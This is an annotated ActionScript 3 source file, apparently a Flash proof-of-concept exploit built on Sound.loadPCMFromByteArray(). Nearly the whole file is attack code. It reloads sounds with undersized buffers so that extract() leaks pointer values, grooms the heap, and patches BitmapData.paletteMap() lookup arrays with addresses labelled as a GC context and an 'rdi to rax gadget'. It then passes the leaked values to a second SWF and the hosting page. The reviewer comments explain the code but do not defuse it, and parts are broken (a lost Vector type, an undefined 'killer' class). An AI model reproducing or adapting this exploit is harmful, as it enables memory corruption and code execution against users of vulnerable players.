package { //import authoring;
    import flash.display.BitmapData;
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.geom.Point;
    import flash.geom.Rectangle;
    import flash.globalization.LocaleID;
    import flash.media.Sound;
    import flash.net.URLRequest;
    import flash.text.TextField;
    import flash.utils.ByteArray;
    import flash.display.Loader;
    import flash.system.Security;
    import flash.external.ExternalInterface;

    /**
     * Document class of a Flash proof-of-concept built around Sound.loadPCMFromByteArray().
     *
     * Review summary, from the visible code only:
     *  - Twice, a Sound object is loaded with a correctly sized PCM buffer and then
     *    re-loaded with a buffer shorter than the declared sample count; the second
     *    call sits in try/catch, and the object is read back with extract() afterwards.
     *  - The extracted floats are rescaled to 16-bit words; a few of them are kept
     *    under the names `vtable` and `buf` (treated by the author as pointer pieces).
     *  - Four 256-entry lookup arrays seeded with marker constants are patched with
     *    those values and passed to BitmapData.paletteMap() 5000 times.
     *  - The recovered values are written to an on-screen TextField and handed to the
     *    hosting page through ExternalInterface.
     *
     * Analyst indicators visible here: a loadPCMFromByteArray() sample count larger than
     * the supplied ByteArray followed by extract() on the same Sound; long paletteMap()
     * loops over arrays of 0x7777xxxx / 0x8888xxxx / 0x9999xxxx / 0x6666xxxx markers;
     * ExternalInterface.call() carrying values derived from extracted audio data.
     */
    public class soundPCM extends Sprite { //public var s2;

        /**
         * Runs the whole sequence at construction time; there are no parameters and
         * nothing is returned. Statement order is significant (allocations and reads
         * are interleaved), so the body is documented in place rather than restructured.
         */
        public function soundPCM() {
            // Lets SWFs and HTML pages from any domain script this SWF.
            Security.allowDomain("*");

            // --- Stage 1: first Sound object -------------------------------------
            var s = new Sound();
            var b = new ByteArray();
            // 504 float samples * 4 bytes = 2016 bytes: the buffer matches the declared size.
            for( var i = 0; i < 504*4; i++){ b.writeByte(1); }
            b.position = 0;
            s.loadPCMFromByteArray(b, 504, "float", false, 44100.0);

            var c = new ByteArray();
            // Only 1010 bytes are supplied for the same 504 float samples (2016 bytes needed).
            for(var i = 0; i < 1010; i++){ c.writeByte(1); }
            c.position = 0;
            // The undersized load is expected to throw; the message is only traced.
            // NOTE(review): the code keeps using `s` after the failure, so it relies on
            // whatever state the failed call leaves behind - confirm against the player build.
            try{ s.loadPCMFromByteArray(c, 504, "float", false, 44000.0); }catch(e:Error){ trace(e.message); }

            var d = new ByteArray();
            // Read 32 samples back out of the Sound object, starting at position 0.
            s.extract(d, 32, 0);
            d.position = 0;

            var t:TextField = new TextField();
            var lb = 0;          // count of values read so far (shared with the second read loop)
            var vtable = [];     // three 16-bit words kept from the first extract()
            try{
                while(true){
                    // Rescale the normalised float sample to a 16-bit integer and make it unsigned.
                    var n = d.readFloat() * 32768.0;
                    if (n < 0) n = n + 0x10000;
                    // Hex-dump every value into the text field, four per line.
                    t.text = t.text + n.toString(16);
                    t.text = t.text + " ";
                    if(lb % 4 == 3){ t.text = t.text + "\r\n"; }
                    lb++;
                    // The 17th, 18th and 19th values are kept, low word first.
                    if(lb == 17){ vtable[0] = n; }
                    if(lb == 18){ vtable[1] = n; }
                    if(lb == 19){ vtable[2] = n; }
                    if(lb == 20){ break; }
                }
            }catch(e){ }   // any read error (e.g. running out of data) is silently ignored
            t.width = t.height = 3000;
            // Replaces the hex dump with the three kept words, high word first.
            t.text = "vtable" + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
            addChild(t);

            // --- Allocation pattern between the two stages -----------------------
            var vstr = "";//"i am a temp string, oh yes i am, oh yes i am 324833241832418074384328097234803248907248902434034870330872079483";//"123412341234" + String.fromCharCode(vtable[0], vtable[1], vtable[2], 0);
            // Builds a 4095-character string of "A" by repeated concatenation.
            for(var si = 0; si < 4095; si++){ vstr = vstr + "A"; }
            // NOTE(review): the Vector's generic type parameter appears to have been lost when
            // this listing was extracted; the line is left exactly as published.
            var v:Vector. = new Vector.();
            // 100 references to the same string are pushed into the vector.
            for(var q = 0; q < 100; q++){ v.push(vstr); }

            // --- Stage 2: second Sound object, same load / short re-load pattern --
            var s2 = new Sound();
            var b2 = new ByteArray();
            // 202 float samples * 4 bytes = 808 bytes: correctly sized.
            for( var i = 0; i < 202*4; i++){ b2.writeByte(1); }
            b2.position = 0;
            s2.loadPCMFromByteArray(b2, 202, "float", false, 44100.0);

            var c2 = new ByteArray();
            // 302*2+2 = 606 bytes supplied for 302 declared float samples (1208 bytes needed).
            for(var i = 0; i < 302*2+2; i++){ c2.writeByte(1); }
            c2.position = 0;
            try{ s2.loadPCMFromByteArray(c2, 302, "float", false, 44100.0); }catch(e:Error){ trace(e.message); }

            // The same vector is passed as both arguments; the return value is discarded.
            // NOTE(review): the purpose is not evident from this listing - presumably the call
            // is made for its allocations rather than its result; confirm.
            LocaleID.determinePreferredLocales(v, v);

            var d2 = new ByteArray();
            s2.extract(d2, 202, 0);
            d2.position = 0;
            var buf = [0, 0, 0, 0]   // sliding window over the last four 16-bit values read
            try{
                // No break: this loop ends only when readFloat() throws at the end of d2.
                while(true){
                    var n = d2.readFloat() * 32768.0;
                    if (n < 0) n = n + 0x10000;
                    t.text = t.text + n.toString(16);
                    t.text = t.text + " ";
                    if(lb % 16 == 15){ t.text = t.text + "\n"; }
                    lb++;
                    // Shift the window left and append the newest value.
                    buf[0] = buf[1];
                    buf[1] = buf[2];
                    buf[2] = buf[3];
                    buf[3] = n;
                }
            }catch(e){ }   // the terminating read error is swallowed on purpose

            // --- Stage 3: paletteMap() with patched lookup arrays ------------------
            var bmp:BitmapData = new BitmapData(10, 10, true, 10);
            var rect:Rectangle = new Rectangle(0, 0, 10, 10);
            var dp:Point = new Point(5, 5);
            var ra = [];
            var ba = [];
            var ga = [];
            var aa = [];
            // Each channel array gets 256 entries: a distinctive high half-word plus the index,
            // so entries are recognisable by array and position when seen in memory or a crash dump.
            for(var ai = 0; ai < 256; ai++){
                ra[ai] = 0x77770000 + ai;
                ba[ai] = 0x99990000 + ai;
                ga[ai] = 0x88880000 + ai;
                aa[ai] = 0x66660000 + ai;
            }
            // Selected entry pairs are overwritten with a value assembled from buf[0..2] plus a
            // fixed displacement: the odd index takes buf[2], the even index takes
            // (buf[1] << 16) + buf[0] + displacement. The author labels each one "gccontext".
            ra[3] = buf[2]; //gccontext
            ra[2] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext
            ba[0xcd] = buf[2]; //gccontext
            ba[0xcc] = (buf[1] * 0x10000) + buf[0] + 512*4; //gccontext
            aa[0x87] = buf[2]; //gccontext
            aa[0x86] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext
            ra[0x15] = buf[2]; //gccontext
            ra[0x14] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x20; //gccontext
            ga[0x5b] = buf[2]; //gccontext
            ga[0x5a] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x200; //gccontext
            ra[1] = buf[2]; //gccontext
            ra[0] = (buf[1] * 0x10000) + buf[0] + 0x40*4; //gccontext
            // Further pairs are derived from the stage-1 `vtable` words minus hard-coded constants.
            // NOTE(review): the alternative constants left in the trailing comments suggest these
            // offsets were adjusted for a particular player build - confirm before relying on them.
            ra[0x49] = vtable[2];
            ra[0x48] = (vtable[1] * 0x10000) + vtable[0] - 5766910; //- 5269070; //rdi to rax gadget
            // NOTE(review): 0x78656867 is four printable ASCII bytes and the next entry is zero,
            // which looks like a short NUL-terminated string - confirm.
            ra[0x40] = 0x78656867;
            ra[0x41] = 0;
            ra[0x51] = vtable[2];
            ra[0x50] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964;
            ra[0x4b] = vtable[2];
            ra[0x4a] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964;
            // `killer` is not defined anywhere in this listing.
            aa[255] = new killer(); // prevent array free
            // paletteMap() is invoked 5000 times with the patched arrays; errors are only traced.
            for (var times = 0; times < 5000; times++){
                try{ bmp.paletteMap(bmp,rect, dp, ra, ga, ba, aa); }catch(e:Error){ trace(e.message); }
            }

            // Nested handler that would load a second SWF from localhost with the buf values in
            // the query string. Nothing visible registers or calls it (the addEventListener line
            // inside it is commented out), so it is dead code in this listing.
            function startListener (e:Event):void{
                t.text = "Loading Completed";
                var ldr2:Loader = new Loader();
                var url2:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + buf[0] + "&num=14";
                var urlReq2:URLRequest = new URLRequest(url2);
                //ldr.contentLoaderInfo.addEventListener(Event.COMPLETE, startListener);
                ldr2.load(urlReq2);
                addChild(ldr2);
            }

            // --- Stage 4: report the recovered values -------------------------------
            var bstr = buf[2].toString(16) + " " + buf[1].toString(16) + " " +buf[0].toString(16);
            t.text = bstr + "\r\n vtable " + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
            // Builds a URL for a second SWF on 127.0.0.1 (not part of this listing) carrying the
            // buf values, with buf[0] raised by 6 and the "num" parameter left empty.
            var url:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + (buf[0] + 6) + "&num=";
            // Hands the URL to a JavaScript function named sendToJavaScript in the hosting page;
            // that page is not shown here.
            ExternalInterface.call("sendToJavaScript", url);
        }
    }
}